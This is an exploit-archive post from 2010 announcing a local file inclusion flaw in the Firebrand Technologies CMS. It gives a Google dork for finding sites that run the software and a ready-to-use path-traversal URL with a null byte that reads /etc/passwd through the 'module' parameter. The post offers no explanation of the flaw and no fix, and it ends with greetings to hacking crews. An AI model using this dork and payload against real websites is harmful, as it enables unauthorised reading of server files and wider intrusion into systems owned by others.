CMS Firebrand Tec Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CMS Firebrand Tec Local File Inclusion Vulnerability
# Published : 2010-04-25
# Author : R3VAN_BASTARD
# Previous Title : PostNuke 0.764 Module modload SQL Injection Vulnerability
# Next Title : phpegasus (fckeditor) Remote Arbitrary File Upload Exploit

======================================================================
         [L.F.I] Firebrand Technologies [L.F.I]
======================================================================
# Exploit Title	: CMS Firebrand Tec Local File Inclusion Vulnerability
# Date		: 04/24/2010
# Author	: R3VAN_BASTARD
# Software Link	: http://www.firebrandtech.com/
# Version	: V.1.x 
======================================================================
Dork		: intext:"Powered by Firebrand Technologies"

Vulneralbility	:
http://localhost/path/index.php?module=../../../../../../../../../../../../../../../etc/passwd%00
======================================================================
Thanks to:
Yoga0400 : Zeth (S3T4N) : Valencia : Mainhack.com (old members)
Serverisdown.org And All.
======================================================================